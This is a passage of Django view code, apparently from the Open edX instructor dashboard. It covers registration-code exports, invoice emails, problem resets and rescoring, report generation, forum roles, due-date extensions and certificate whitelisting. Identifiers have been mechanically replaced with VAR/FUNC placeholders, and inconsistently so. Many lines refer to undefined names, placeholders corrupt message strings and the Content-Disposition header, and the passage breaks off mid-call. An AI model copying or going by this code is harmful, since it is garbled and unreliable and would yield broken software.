'currency_symbol': settings.PAID_COURSE_REGISTRATION_CURRENCY[1],
'course_url': VAR_111,
'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
'dashboard_url': VAR_112,
'contact_email': VAR_113,
'corp_address': microsite.get_value('invoice_corp_address', settings.INVOICE_CORP_ADDRESS),
'payment_instructions': microsite.get_value('invoice_payment_instructions', settings. INVOICE_PAYMENT_INSTRUCTIONS),
'date': time.strftime("%m/%d/%Y")
}
VAR_115 = u'Confirmation and Invoice for {course_name}'.format(course_name=VAR_65.display_name)
VAR_74 = render_to_string('emails/registration_codes_sale_email.txt', VAR_114)
VAR_116 = render_to_string('emails/registration_codes_sale_invoice_attachment.txt', VAR_114)
VAR_117 = StringIO.StringIO()
VAR_118 = VAR_26.writer(VAR_117)
for registration_code in VAR_85:
VAR_183 = 'http://{base_url}{redeem_code_url}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
redeem_code_url=reverse('register_code_redemption', VAR_3={'registration_code': registration_code.code})
)
VAR_118.writerow([registration_code.code, VAR_183])
VAR_119 = microsite.get_value('finance_email', settings.FINANCE_EMAIL)
if VAR_119:
recipient_list.append(VAR_119)
for recipient in VAR_103:
VAR_14 = EmailMessage()
VAR_14.subject = VAR_115
VAR_14.body = VAR_74
VAR_14.from_email = VAR_113
VAR_14.to = [recipient]
VAR_14.attach(u'RegistrationCodes.csv', VAR_117.getvalue(), 'text/csv')
VAR_14.attach(u'Invoice.txt', VAR_116, 'text/plain')
if VAR_182 is not None:
VAR_14.attach(u'Invoice.pdf', VAR_182.getvalue(), 'application/pdf')
else:
VAR_198 = StringIO.StringIO(_('pdf download unavailable right now, please contact support.'))
VAR_14.attach(u'pdf_unavailable.txt', VAR_198.getvalue(), 'text/plain')
VAR_14.send()
return FUNC_34("Registration_Codes.csv", VAR_85)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@require_POST
def FUNC_38(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_120 = CourseRegistrationCode.objects.filter(
VAR_10=course_id
).order_by('invoice_item__invoice__company_name')
VAR_88 = VAR_9.POST['active_company_name']
if VAR_88:
VAR_120 = registration_codes_list.filter(invoice_item__invoice__company_name=VAR_88)
VAR_121 = RegistrationCodeRedemption.objects.select_related(
'registration_code', 'registration_code__invoice_item__invoice'
).filter(registration_code__course_id=VAR_10)
if VAR_121.exists():
VAR_184 = [VAR_82.registration_code.code for VAR_82 in VAR_121]
VAR_120 = registration_codes_list.exclude(code__in=VAR_184)
return FUNC_34("Active_Registration_Codes.csv", VAR_120)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@require_POST
def FUNC_39(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_121 = RegistrationCodeRedemption.objects.select_related('registration_code').filter(
registration_code__course_id=VAR_10
)
VAR_122 = []
if VAR_121.exists():
VAR_184 = [VAR_82.registration_code.code for VAR_82 in VAR_121]
VAR_122 = CourseRegistrationCode.objects.filter(
VAR_10=course_id, code__in=VAR_184
).order_by('invoice_item__invoice__company_name').select_related('invoice_item__invoice')
VAR_88 = VAR_9.POST['spent_company_name']
if VAR_88:
VAR_122 = spent_codes_list.filter(invoice_item__invoice__company_name=VAR_88) # pylint: disable=maybe-no-member
VAR_34 = 'spent'
return FUNC_34("Spent_Registration_Codes.csv", VAR_122, VAR_34)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_40(VAR_9, VAR_10): # pylint: disable=unused-argument
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
def FUNC_86(VAR_123, VAR_86, VAR_124):
VAR_185 = HttpResponse(content_type='text/csv')
VAR_185['Content-Disposition'] = 'attachment; VAR_123={0}'.format(unicode(VAR_123).encode('utf-8'))
VAR_186 = VAR_26.writer(VAR_185, dialect='excel', quotechar='"', quoting=VAR_26.QUOTE_ALL)
VAR_187 = [unicode(s).encode('utf-8') for s in VAR_86]
VAR_186.writerow(VAR_187)
for row in VAR_124:
VAR_187 = [unicode(s).encode('utf-8') for s in row]
VAR_186.writerow(VAR_187)
return VAR_185
VAR_125 = User.objects.filter(
courseenrollment__course_id=VAR_10,
).order_by('id')
VAR_86 = ['User ID', 'Anonymized User ID', 'Course Specific Anonymized User ID']
VAR_124 = [[s.id, unique_id_for_user(s, save=False), anonymous_id_for_user(s, VAR_10, save=False)] for s in VAR_125]
return FUNC_86(VAR_10.to_deprecated_string().replace('/', '-') + '-anon-ids.csv', VAR_86, VAR_124)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_0
@FUNC_3('staff')
@FUNC_1(
VAR_141="email or VAR_15 of VAR_40 for whom to get progress url"
)
def FUNC_41(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_19 = get_student_from_identifier(VAR_9.GET.get('unique_student_identifier'))
VAR_126 = reverse('student_progress', VAR_3={'course_id': VAR_10.to_deprecated_string(), 'student_id': VAR_19.id})
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
'progress_url': VAR_126,
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1(
VAR_127="problem urlname to reset"
)
@FUNC_0
def FUNC_42(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'staff', VAR_10, depth=None
)
VAR_127 = strip_if_string(VAR_9.GET.get('problem_to_reset'))
VAR_128 = VAR_9.GET.get('unique_student_identifier', None)
VAR_40 = None
if VAR_128 is not None:
VAR_40 = get_student_from_identifier(VAR_128)
VAR_129 = VAR_9.GET.get('all_students', False) in ['true', 'True', True]
VAR_130 = VAR_9.GET.get('delete_module', False) in ['true', 'True', True]
if VAR_129 and VAR_40:
return HttpResponseBadRequest(
"all_students and VAR_141 are mutually exclusive."
)
if VAR_129 and VAR_130:
return HttpResponseBadRequest(
"all_students and VAR_130 are mutually exclusive."
)
if VAR_129 or VAR_130:
if not has_access(VAR_9.user, 'instructor', VAR_65):
return HttpResponseForbidden("Requires instructor VAR_165.")
try:
VAR_188 = VAR_10.make_usage_key_from_deprecated_string(VAR_127)
except InvalidKeyError:
return HttpResponseBadRequest()
VAR_63 = {}
response_payload['problem_to_reset'] = VAR_127
if VAR_40:
try:
enrollment.reset_student_attempts(
VAR_10,
VAR_40,
VAR_188,
requesting_user=VAR_9.user,
VAR_130=delete_module
)
except StudentModule.DoesNotExist:
return HttpResponseBadRequest(_("Module does not exist."))
except sub_api.SubmissionError:
VAR_208 = _("An VAR_169 occurred while deleting the score.")
return HttpResponse(VAR_208, status=500)
VAR_63['student'] = VAR_128
elif VAR_129:
instructor_task.api.submit_reset_problem_attempts_for_all_students(VAR_9, VAR_188)
VAR_63['task'] = 'created'
VAR_63['student'] = 'All Students'
else:
return HttpResponseBadRequest()
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_0
def FUNC_43(VAR_9, VAR_10): # pylint: disable=invalid-VAR_16
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'staff', VAR_10, depth=None
)
if not VAR_65.entrance_exam_id:
return HttpResponseBadRequest(
_("Course has no entrance exam VAR_39.")
)
VAR_128 = VAR_9.GET.get('unique_student_identifier', None)
VAR_40 = None
if VAR_128 is not None:
VAR_40 = get_student_from_identifier(VAR_128)
VAR_129 = VAR_9.GET.get('all_students', False) in ['true', 'True', True]
VAR_130 = VAR_9.GET.get('delete_module', False) in ['true', 'True', True]
if VAR_129 and VAR_40:
return HttpResponseBadRequest(
_("all_students and VAR_141 are mutually exclusive.")
)
if VAR_129 and VAR_130:
return HttpResponseBadRequest(
_("all_students and VAR_130 are mutually exclusive.")
)
if VAR_129 or VAR_130:
if not has_access(VAR_9.user, 'instructor', VAR_65):
return HttpResponseForbidden(_("Requires instructor VAR_165."))
try:
VAR_189 = VAR_10.make_usage_key_from_deprecated_string(VAR_65.entrance_exam_id)
if VAR_130:
instructor_task.api.submit_delete_entrance_exam_state_for_student(VAR_9, VAR_189, VAR_40)
else:
instructor_task.api.submit_reset_problem_attempts_in_entrance_exam(VAR_9, VAR_189, VAR_40)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
VAR_63 = {'student': VAR_128 or _('All Students'), 'task': 'created'}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('instructor')
@FUNC_1(VAR_127="problem urlname to reset")
@FUNC_0
def FUNC_44(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_127 = strip_if_string(VAR_9.GET.get('problem_to_reset'))
VAR_128 = VAR_9.GET.get('unique_student_identifier', None)
VAR_40 = None
if VAR_128 is not None:
VAR_40 = get_student_from_identifier(VAR_128)
VAR_129 = VAR_9.GET.get('all_students') in ['true', 'True', True]
if not (VAR_127 and (VAR_129 or VAR_40)):
return HttpResponseBadRequest("Missing query parameters.")
if VAR_129 and VAR_40:
return HttpResponseBadRequest(
"Cannot rescore with VAR_129 and VAR_141."
)
try:
VAR_188 = VAR_10.make_usage_key_from_deprecated_string(VAR_127)
except InvalidKeyError:
return HttpResponseBadRequest("Unable to parse problem id")
VAR_63 = {}
response_payload['problem_to_reset'] = VAR_127
if VAR_40:
VAR_63['student'] = VAR_128
instructor_task.api.submit_rescore_problem_for_student(VAR_9, VAR_188, VAR_40)
VAR_63['task'] = 'created'
elif VAR_129:
instructor_task.api.submit_rescore_problem_for_all_students(VAR_9, VAR_188)
VAR_63['task'] = 'created'
else:
return HttpResponseBadRequest()
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('instructor')
@FUNC_0
def FUNC_45(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'staff', VAR_10, depth=None
)
VAR_128 = VAR_9.GET.get('unique_student_identifier', None)
VAR_40 = None
if VAR_128 is not None:
VAR_40 = get_student_from_identifier(VAR_128)
VAR_129 = VAR_9.GET.get('all_students') in ['true', 'True', True]
if not VAR_65.entrance_exam_id:
return HttpResponseBadRequest(
_("Course has no entrance exam VAR_39.")
)
if VAR_129 and VAR_40:
return HttpResponseBadRequest(
_("Cannot rescore with VAR_129 and VAR_141.")
)
try:
VAR_189 = VAR_10.make_usage_key_from_deprecated_string(VAR_65.entrance_exam_id)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
VAR_63 = {}
if VAR_40:
VAR_63['student'] = VAR_128
else:
VAR_63['student'] = _("All Students")
instructor_task.api.submit_rescore_entrance_exam_for_student(VAR_9, VAR_189, VAR_40)
VAR_63['task'] = 'created'
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_46(VAR_9, VAR_10): # pylint: disable=unused-argument
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_131 = 'bulk_course_email'
VAR_132 = instructor_task.api.get_instructor_task_history(VAR_10, VAR_131=task_type)
VAR_63 = {
'tasks': map(extract_task_features, VAR_132),
}
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_47(VAR_9, VAR_10): # pylint: disable=unused-argument
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_131 = 'bulk_course_email'
VAR_133 = instructor_task.api.get_instructor_task_history(VAR_10, VAR_131=task_type)
VAR_63 = {
'emails': map(extract_email_features, VAR_133),
}
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_48(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_134 = strip_if_string(VAR_9.GET.get('problem_location_str', False))
VAR_40 = VAR_9.GET.get('unique_student_identifier', None)
if VAR_40 is not None:
VAR_40 = get_student_from_identifier(VAR_40)
if VAR_40 and not VAR_134:
return HttpResponseBadRequest(
"unique_student_identifier must accompany problem_location_str"
)
if VAR_134:
try:
VAR_188 = VAR_10.make_usage_key_from_deprecated_string(VAR_134)
except InvalidKeyError:
return HttpResponseBadRequest()
if VAR_40:
VAR_132 = instructor_task.api.get_instructor_task_history(VAR_10, VAR_188, VAR_40)
else:
VAR_132 = instructor_task.api.get_instructor_task_history(VAR_10, VAR_188)
else:
VAR_132 = instructor_task.api.get_running_instructor_tasks(VAR_10)
VAR_63 = {
'tasks': map(extract_task_features, VAR_132),
}
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_49(VAR_9, VAR_10): # pylint: disable=invalid-VAR_16
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_by_id(VAR_10)
VAR_40 = VAR_9.GET.get('unique_student_identifier', None)
if VAR_40 is not None:
VAR_40 = get_student_from_identifier(VAR_40)
try:
VAR_189 = VAR_10.make_usage_key_from_deprecated_string(VAR_65.entrance_exam_id)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
if VAR_40:
VAR_132 = instructor_task.api.get_entrance_exam_instructor_task_history(VAR_10, VAR_189, VAR_40)
else:
VAR_132 = instructor_task.api.get_entrance_exam_instructor_task_history(VAR_10, VAR_189)
VAR_63 = {
'tasks': map(extract_task_features, VAR_132),
}
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_50(VAR_35, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_135 = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
VAR_63 = {
'downloads': [
dict(VAR_16=name, VAR_147=url, link=HTML('<a href="{}">{}</a>').format(HTML(VAR_147), Text(VAR_16)))
for VAR_16, VAR_147 in VAR_135.links_for(VAR_10)
]
}
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_6
def FUNC_51(VAR_35, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_135 = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
VAR_63 = {
'downloads': [
dict(VAR_16=name, VAR_147=url, link=HTML('<a href="{}">{}</a>').format(HTML(VAR_147), Text(VAR_16)))
for VAR_16, VAR_147 in VAR_135.links_for(VAR_10)
]
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_52(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_export_ora2_data(VAR_9, VAR_38)
VAR_172 = _("The ORA VAR_192 report is being generated.")
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _(
"An ORA VAR_192 report generation VAR_150 is already in "
"progress. Check the 'Pending Tasks' table "
"for the status of the VAR_150. When completed, the report "
"will be available for download in the table below."
)
return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_53(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_calculate_grades_csv(VAR_9, VAR_38)
VAR_172 = _("The grade report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _("The grade report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_54(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_problem_grade_report(VAR_9, VAR_38)
VAR_172 = _("The problem grade report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _("A problem grade report is already being generated."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({
"status": VAR_196
})
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1('rolename')
def FUNC_55(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_by_id(VAR_10)
VAR_136 = has_access(VAR_9.user, 'instructor', VAR_65)
VAR_137 = has_forum_access(
VAR_9.user, VAR_10, FORUM_ROLE_ADMINISTRATOR
)
VAR_64 = VAR_9.GET.get('rolename')
if not (VAR_137 or VAR_136):
return HttpResponseBadRequest(
"Operation requires staff & forum admin or instructor access"
)
if VAR_64 == FORUM_ROLE_ADMINISTRATOR and not VAR_136:
return HttpResponseBadRequest("Operation requires instructor VAR_165.")
if VAR_64 not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
return HttpResponseBadRequest(strip_tags(
"Unrecognized VAR_64 '{}'.".format(VAR_64)
))
try:
VAR_190 = Role.objects.get(VAR_16=VAR_64, VAR_10=VAR_10)
VAR_191 = VAR_190.users.all().order_by('username')
except Role.DoesNotExist:
VAR_191 = []
def FUNC_85(VAR_19):
return {
'username': VAR_19.username,
'email': VAR_19.email,
'first_name': VAR_19.first_name,
'last_name': VAR_19.last_name,
}
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
VAR_64: map(FUNC_85, VAR_191),
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_2(send_to="sending to whom", VAR_115="subject line", VAR_74="message text")
def FUNC_56(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
if not BulkEmailFlag.feature_enabled(VAR_10):
return HttpResponseForbidden("Email is not enabled for this VAR_65.")
VAR_138 = json.loads(VAR_9.POST.get("send_to"))
VAR_115 = VAR_9.POST.get("subject")
VAR_74 = VAR_9.POST.get("message")
VAR_139 = microsite.get_value('course_email_template_name')
VAR_140 = microsite.get_value('course_email_from_addr')
try:
VAR_14 = CourseEmail.create(
VAR_10,
VAR_9.user,
VAR_138,
VAR_115, VAR_74,
VAR_139=template_name,
VAR_140=from_addr
)
except ValueError as err:
return HttpResponseBadRequest(repr(err))
instructor_task.api.submit_bulk_course_email(VAR_9, VAR_10, VAR_14.id)
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
'success': True,
}
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1(
VAR_141="email or VAR_15 of VAR_19 to change access",
VAR_64="the forum role",
VAR_57="'allow' or 'revoke'",
)
@FUNC_0
def FUNC_57(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_by_id(VAR_10)
VAR_136 = has_access(VAR_9.user, 'instructor', VAR_65)
VAR_137 = has_forum_access(
VAR_9.user, VAR_10, FORUM_ROLE_ADMINISTRATOR
)
VAR_141 = VAR_9.GET.get('unique_student_identifier')
VAR_64 = VAR_9.GET.get('rolename')
VAR_57 = VAR_9.GET.get('action')
if not (VAR_137 or VAR_136):
return HttpResponseBadRequest(
"Operation requires staff & forum admin or instructor access"
)
if VAR_64 == FORUM_ROLE_ADMINISTRATOR and not VAR_136:
return HttpResponseBadRequest("Operation requires instructor VAR_165.")
if VAR_64 not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
return HttpResponseBadRequest(strip_tags(
"Unrecognized VAR_64 '{}'.".format(VAR_64)
))
VAR_19 = get_student_from_identifier(VAR_141)
try:
update_forum_role(VAR_10, VAR_19, VAR_64, VAR_57)
except Role.DoesNotExist:
return HttpResponseBadRequest("Role does not exist.")
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
'action': VAR_57,
}
return JsonResponse(VAR_63)
@require_POST
def FUNC_58(VAR_9, VAR_10): # pylint: disable=unused-argument
VAR_142 = True
VAR_143 = get_user_preference(VAR_9.user, INVOICE_KEY)
if VAR_143 is not None:
VAR_142 = VAR_143 == 'True'
return JsonResponse({
'invoice_copy': VAR_142
})
def FUNC_59(VAR_36):
VAR_16 = getattr(VAR_36, 'display_name', None)
if VAR_16:
return u'{0} ({1})'.format(VAR_16, VAR_36.location.to_deprecated_string())
else:
return VAR_36.location.to_deprecated_string()
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1('student', 'url', 'due_datetime')
def FUNC_60(VAR_9, VAR_10):
VAR_65 = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
VAR_40 = require_student_from_identifier(VAR_9.GET.get('student'))
VAR_36 = find_unit(VAR_65, VAR_9.GET.get('url'))
VAR_144 = parse_datetime(VAR_9.GET.get('due_datetime'))
set_due_date_extension(VAR_65, VAR_36, VAR_40, VAR_144)
return JsonResponse(_(
'Successfully changed due date for VAR_40 {0} for {1} '
'to {2}').format(VAR_40.profile.name, FUNC_59(VAR_36),
VAR_144.strftime('%Y-%m-%d %H:%M')))
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1('student', 'url')
def FUNC_61(VAR_9, VAR_10):
VAR_65 = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
VAR_40 = require_student_from_identifier(VAR_9.GET.get('student'))
VAR_36 = find_unit(VAR_65, VAR_9.GET.get('url'))
set_due_date_extension(VAR_65, VAR_36, VAR_40, None)
if not getattr(VAR_36, "due", None):
return JsonResponse(
_("Successfully removed invalid due date extension (VAR_36 has no due date).")
)
VAR_145 = VAR_36.due.strftime('%Y-%m-%d %H:%M')
return JsonResponse(_(
'Successfully reset due date for VAR_40 {0} for {1} '
'to {2}').format(VAR_40.profile.name, FUNC_59(VAR_36),
VAR_145))
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1('url')
def FUNC_62(VAR_9, VAR_10):
VAR_65 = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
VAR_36 = find_unit(VAR_65, VAR_9.GET.get('url'))
return JsonResponse(dump_module_extensions(VAR_65, VAR_36))
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_1('student')
def FUNC_63(VAR_9, VAR_10):
VAR_40 = require_student_from_identifier(VAR_9.GET.get('student'))
VAR_65 = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
return JsonResponse(dump_student_extensions(VAR_65, VAR_40))
def FUNC_64(VAR_37):
VAR_146 = re.split(r'[\n\r\s,]', VAR_37)
VAR_146 = [s.strip() for s in VAR_146]
VAR_146 = [s for s in VAR_146 if s != '']
return VAR_146
def FUNC_65(VAR_38, VAR_39=None):
VAR_147 = reverse('instructor_dashboard', VAR_3={'course_id': unicode(VAR_38)})
if VAR_39 is not None:
VAR_147 += u'#view-{VAR_39}'.format(VAR_39=section)
return VAR_147
@FUNC_4
@require_POST
def FUNC_66(VAR_9, VAR_10=None): # pylint: disable=unused-argument
VAR_38 = CourseKey.from_string(VAR_10)
certs_api.generate_example_certificates(VAR_38)
return redirect(FUNC_65(VAR_38, VAR_39='certificates'))
@FUNC_4
@require_POST
def FUNC_67(VAR_9, VAR_10=None):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_148 = (VAR_9.POST.get('certificates-enabled', 'false') == 'true')
certs_api.set_cert_generation_enabled(VAR_38, VAR_148)
return redirect(FUNC_65(VAR_38, VAR_39='certificates'))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@require_POST
def FUNC_68(VAR_9, VAR_10): # pylint: disable=invalid-VAR_16
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_128 = VAR_9.POST.get('unique_student_identifier')
VAR_40 = get_student_from_identifier(VAR_128)
VAR_72, VAR_149 = EntranceExamConfiguration.objects.get_or_create(VAR_19=VAR_40, VAR_10=VAR_10)
if VAR_149:
VAR_74 = _('This VAR_40 (%s) will skip the entrance exam.') % VAR_128
else:
VAR_74 = _('This VAR_40 (%s) is already allowed to skip the entrance exam.') % VAR_128
VAR_63 = {
'message': VAR_74,
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_POST
def FUNC_69(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_150 = instructor_task.api.generate_certificates_for_students(VAR_9, VAR_38)
VAR_74 = _('Certificate generation VAR_150 for all VAR_125 of this VAR_65 has been started. '
'You can view the status of the generation VAR_150 in the "Pending Tasks" VAR_39.')
VAR_63 = {
'message': VAR_74,
'task_id': VAR_150.task_id
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_POST
def FUNC_70(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_151 = VAR_9.POST.getlist('certificate_statuses', [])
if not VAR_151:
return JsonResponse(
{'message': _('Please select one or more VAR_163 statuses that require VAR_163 regeneration.')},
status=400
)
VAR_152 = [CertificateStatuses.downloadable, CertificateStatuses.error, CertificateStatuses.notpassing]
if not set(VAR_151).issubset(VAR_152):
return JsonResponse(
{'message': _('Please select VAR_163 statuses from the list only.')},
status=400
)
try:
instructor_task.api.regenerate_certificates(VAR_9, VAR_38, VAR_151)
except AlreadyRunningError as VAR_169:
return JsonResponse({'message': VAR_169.message}, status=400)
VAR_63 = {
'message': _('Certificate regeneration VAR_150 has been started. '
'You can view the status of the generation VAR_150 in the "Pending Tasks" VAR_39.'),
'success': True
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_http_methods(['POST', 'DELETE'])
def FUNC_71(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
try:
VAR_41, VAR_40 = FUNC_74(VAR_9, VAR_38)
except ValueError as VAR_169:
return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
if VAR_9.method == 'POST':
try:
VAR_154 = FUNC_72(VAR_38, VAR_40, VAR_41)
except ValueError as VAR_169:
return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
return JsonResponse(VAR_154)
elif VAR_9.method == 'DELETE':
try:
FUNC_73(VAR_38, VAR_40)
except ValueError as VAR_169:
return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
return JsonResponse({}, status=204)
def FUNC_72(VAR_38, VAR_40, VAR_41):
if len(CertificateWhitelist.get_certificate_white_list(VAR_38, VAR_40)) > 0:
raise ValueError(
_("Student (VAR_15/VAR_14={VAR_19}) already in VAR_163 VAR_154 list.").format(VAR_19=VAR_40.username)
)
VAR_153, VAR_72 = CertificateWhitelist.objects.get_or_create(
VAR_19=VAR_40,
VAR_10=VAR_38,
defaults={
'whitelist': True,
'notes': VAR_41.get('notes', '')
}
)
VAR_44 = GeneratedCertificate.eligible_certificates.filter(
VAR_19=VAR_40,
VAR_10=VAR_38,
status=CertificateStatuses.downloadable,
).first()
VAR_154 = dict({
'id': VAR_153.id,
'user_email': VAR_40.email,
'user_name': VAR_40.username,
'user_id': VAR_40.id,
'certificate_generated': VAR_44 and VAR_44.created_date.strftime("%B %d, %Y"),
'created': VAR_153.created.strftime("%A, %B %d, %Y"),
})
return VAR_154
def FUNC_73(VAR_38, VAR_40):
try:
VAR_41 = CertificateWhitelist.objects.get(VAR_19=VAR_40, VAR_10=VAR_38)
except ObjectDoesNotExist:
raise ValueError(
_('Certificate VAR_154 (VAR_19={VAR_19}) does not exist in VAR_163 white list. '
'Please refresh the page and try again.').format(VAR_19=VAR_40.username)
)
try:
VAR_44 = GeneratedCertificate.objects.get( # pylint: disable=no-member
VAR_19=VAR_40,
VAR_10=VAR_38
)
VAR_44.invalidate()
VAR_0.info(
